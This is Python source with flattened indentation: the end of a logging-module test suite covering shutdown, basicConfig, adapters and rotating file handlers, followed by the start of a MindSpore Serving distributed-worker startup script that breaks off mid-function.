self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
@support.requires_type_collecting
def test_logging_at_shutdown(self):
# Issue #20037
code = """if 1:
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()"""
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
if threading:
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.level = self.original_logging_level
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='foo')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, 'foo')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
def test_nested(self):
class Adapter(logging.LoggerAdapter):
prefix = 'Adapter'
def process(self, msg, kwargs):
return f"{self.prefix} {msg}", kwargs
msg = 'Adapters can be nested, yo.'
adapter = Adapter(logger=self.logger, extra=None)
adapter_adapter = Adapter(logger=adapter, extra=None)
adapter_adapter.prefix = 'AdapterAdapter'
self.assertEqual(repr(adapter), repr(adapter_adapter))
adapter_adapter.log(logging.CRITICAL, msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, f"Adapter AdapterAdapter {msg}")
self.assertEqual(record.args, (self.recording,))
orig_manager = adapter_adapter.manager
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
temp_manager = object()
try:
adapter_adapter.manager = temp_manager
self.assertIs(adapter_adapter.manager, temp_manager)
self.assertIs(adapter.manager, temp_manager)
self.assertIs(self.logger.manager, temp_manager)
finally:
adapter_adapter.manager = orig_manager
self.assertIs(adapter_adapter.manager, orig_manager)
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
        # If maxBytes is zero, rollover never occurs.
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
        # Check that the file is created, and assume it was created by us.
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
@support.requires_zlib
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
# print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
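# The loop above attaches one generated test method per rollover interval to
# TimedRotatingFileHandlerTest. A minimal sketch of the same pattern (the names
# below are illustrative only, not part of this test suite):
#
#     for name, value in (('foo', 1), ('bar', 2)):
#         def test(self, value=value):   # default argument freezes the loop variable
#             self.assertEqual(value, value)
#         setattr(SomeTestCase, 'test_%s' % name, test)
#
# Binding `when` and `exp` as default arguments is what keeps each generated
# method tied to its own (when, exp) pair instead of the last loop iteration.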
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
try:
h = logging.handlers.NTEventLogHandler('test_logging')
except pywintypes.error as e:
if e.winerror == 5: # access denied
raise unittest.SkipTest('Insufficient privileges to run test')
raise
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
blacklist = {'logThreads', 'logMultiprocessing',
'logProcesses', 'currentframe',
'PercentStyle', 'StrFormatStyle', 'StringTemplateStyle',
'Filterer', 'PlaceHolder', 'Manager', 'RootLogger',
'root', 'threading'}
support.check__all__(self, logging, blacklist=blacklist)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@support.run_with_locale('LC_ALL', '')
def test_main():
tests = [
BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest,
HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest,
DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest,
ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest,
LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest,
RotatingFileHandlerTest, LastResortTest, LogRecordTest,
ExceptionTest, SysLogHandlerTest, IPv6SysLogHandlerTest, HTTPHandlerTest,
NTEventLogHandlerTest, TimedRotatingFileHandlerTest,
UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest,
MiscTestCase
]
if False and hasattr(logging.handlers, 'QueueListener'):
tests.append(QueueListenerTest)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
start_distributed_worker.py
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Start distributed worker process"""
import os
import sys
import time
import threading
import psutil
import mindspore_serving.log as logger
from mindspore_serving.server import worker
from mindspore_serving.server.worker import distributed
from mindspore_serving.server.common import check_type
from mindspore_serving._mindspore_serving import ExitSignalHandle_
from mindspore_serving._mindspore_serving import Worker_
def start_listening_parent_thread(servable_name):
"""listening to parent process status"""
def worker_listening_parent_thread():
parent_process = psutil.Process(os.getppid())
while parent_process.is_running() and not ExitSignalHandle_.has_stopped():
time.sleep(0.1)
logger.warning(f"Distributed worker {servable_name}, detect parent "
f"pid={parent_process.pid} has exited or receive Ctrl+C message, worker begin to exit")
worker.stop()
thread = threading.Thread(target=worker_listening_parent_thread)
thread.start()
def start_worker(servable_directory, servable_name, version_number, rank_table_json_file,
distributed_address, wait_agents_time_in_seconds,
master_address, listening_master=False):
"""Start distributed worker process"""
check_type.check_str('servable_directory', servable_directory)
check_type.check_str('servable_name', servable_name)
check_type.check_int('version_number', version_number, 0)
check_type.check_str('rank_table_json_file', rank_table_json_file)
check_type.check_str('distributed_address', distributed_address)
check_type.check_int('wait_agents_time_in_seconds', wait_agents_time_in_seconds, 0)
check_type.check_str('master_address', master_address)
check_type.check_bool('listening_master', listening_master)
ExitSignalHandle_.start() # Set flag to running and receive Ctrl+C message
if listening_master:
start_listening_parent_thread(servable_name)
worker_pid = os.getpid()
